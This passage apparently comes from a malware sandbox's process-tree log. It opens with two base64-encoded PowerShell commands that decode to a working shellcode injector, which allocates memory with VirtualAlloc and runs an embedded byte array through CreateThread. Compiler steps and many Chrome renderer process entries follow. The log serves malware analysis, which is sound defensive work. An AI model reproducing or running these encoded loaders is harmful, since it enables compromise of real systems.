lACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
4⤵
PID:9112

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
5⤵
PID:7052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzag00z3\uzag00z3.cmdline"
6⤵
PID:7832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A6.tmp" "c:\Users\Admin\AppData\Local\Temp\uzag00z3\CSC514C132705A448F934D7421F9C5A746.TMP"
7⤵
PID:3568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=1516 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=6960 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=13160 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=13172 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=8520 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=9832 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=5468 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --mojo-platform-channel-handle=5440 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --mojo-platform-channel-handle=3044 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --mojo-platform-channel-handle=2088 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --mojo-platform-channel-handle=5328 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:9088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --mojo-platform-channel-handle=5348 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:9076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=8424 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=5448 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --mojo-platform-channel-handle=3716 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:1452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --mojo-platform-channel-handle=8848 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --mojo-platform-channel-handle=6564 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --mojo-platform-channel-handle=12688 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:1704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --mojo-platform-channel-handle=12584 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --mojo-platform-channel-handle=13532 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --mojo-platform-channel-handle=7552 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --mojo-platform-channel-handle=12532 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --mojo-platform-channel-handle=9040 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --mojo-platform-channel-handle=3056 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --mojo-platform-channel-handle=11640 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --mojo-platform-channel-handle=7404 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --mojo-platform-channel-handle=12520 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --mojo-platform-channel-handle=8680 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --mojo-platform-channel-handle=3120 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8280

C:\Program Files\Google\Chrome\Application\chrome.exe
